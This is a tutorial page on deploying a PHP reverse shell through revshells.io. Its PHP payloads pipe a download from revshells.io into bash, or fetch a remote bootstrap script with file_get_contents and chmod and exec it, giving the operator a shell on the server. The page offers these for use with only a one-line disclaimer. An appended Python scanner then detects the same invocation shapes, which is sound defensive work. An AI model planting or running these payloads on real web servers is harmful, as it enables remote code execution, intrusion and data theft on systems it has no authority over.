PHP reverse shell with revshells.io
Classic PHP reverse shells often embed a hard-coded attacker IP and a raw TCP socket. revshells.io replaces that with an HTTPS callback: your PHP code only needs to fetch and execute the session bootstrap once.
1. Create a session
From revshells.io, create a session and copy your session ID.
2. Invoke the bootstrap from PHP
If shell_exec / exec / passthru are allowed and curl exists on the host:
passthru('curl -fsSL https://revshells.io/SESSION-ID/revshell | bash');
Prefer no-PTY when running from a web request (short-lived, no TTY):
passthru('curl -fsSL https://revshells.io/SESSION-ID/nopty | bash');
3. Pure PHP fetch (no shell functions)
When only HTTP wrappers work, fetch the bootstrap script with file_get_contents, write it to a temporary file, and execute it if exec is permitted:
$script = file_get_contents('https://revshells.io/SESSION-ID/revshell');
$tmp = tempnam(sys_get_temp_dir(), 'rs');
file_put_contents($tmp, $script);
chmod($tmp, 0755);
exec($tmp);
The bootstrap is a shell script that downloads rs-agent and connects back to your session.
4. Operate the callback
Watch the session page on revshells.io for the beacon to connect, then use the built-in terminal or rsctl attach.
For authorized security testing, CTFs, and lab environments only.
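For defenders reviewing a web root, the two invocation shapes in steps 2 and 3 can be matched statically. The following is an added example, not code from revshells.io or the original page: the function name `scan_php`, the heuristic labels, and the sample hosts are assumptions constructed for illustration, and the heuristics can produce false positives that need manual review.

```python
import re

# Command-execution functions named in step 2, plus close PHP relatives.
EXEC_FUNCS = r"(?:shell_exec|exec|passthru|system|popen|proc_open)"

# Step 2 shape: exec-family call whose string argument pipes a download to a shell.
PIPE_TO_SHELL = re.compile(
    r"\b" + EXEC_FUNCS
    + r"\s*\(\s*['\"][^'\"]*\b(?:curl|wget)\b[^'\"|]*\|\s*(?:ba|da|z)?sh\b",
    re.IGNORECASE,
)
# Step 3 shape, judged per file: remote fetch + chmod + exec-family call.
REMOTE_FETCH = re.compile(r"\bfile_get_contents\s*\(\s*['\"]https?://", re.IGNORECASE)
CHMOD_CALL = re.compile(r"\bchmod\s*\(", re.IGNORECASE)
EXEC_CALL = re.compile(r"\b" + EXEC_FUNCS + r"\s*\(", re.IGNORECASE)


def scan_php(source):
    """Return the names of the heuristics that match one PHP source string."""
    findings = []
    if PIPE_TO_SHELL.search(source):
        findings.append("exec-download-pipe-shell")
    if (REMOTE_FETCH.search(source) and CHMOD_CALL.search(source)
            and EXEC_CALL.search(source)):
        findings.append("remote-fetch-chmod-exec")
    return findings


# Constructed samples (placeholder host and token, not real indicators).
SAMPLES = {
    "pipe.php": "<?php passthru('curl -fsSL https://dl.example.invalid/TOKEN/boot | bash');",
    "fetch.php": (
        "<?php $s = file_get_contents('https://dl.example.invalid/TOKEN/boot');\n"
        "$t = tempnam(sys_get_temp_dir(), 'x'); file_put_contents($t, $s);\n"
        "chmod($t, 0755); exec($t);"
    ),
    "benign_api.php": (
        "<?php $j = file_get_contents('https://api.example.invalid/v1');\n"
        "$c = curl_init(); curl_exec($c); echo json_decode($j)->status;"
    ),
    "benign_curl.php": "<?php echo shell_exec('curl -s https://api.example.invalid/health');",
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, scan_php(src) or "clean")
```

A hit is a triage lead only; pairing it with a `disable_functions` review and egress filtering on the web tier addresses the same behaviour at runtime.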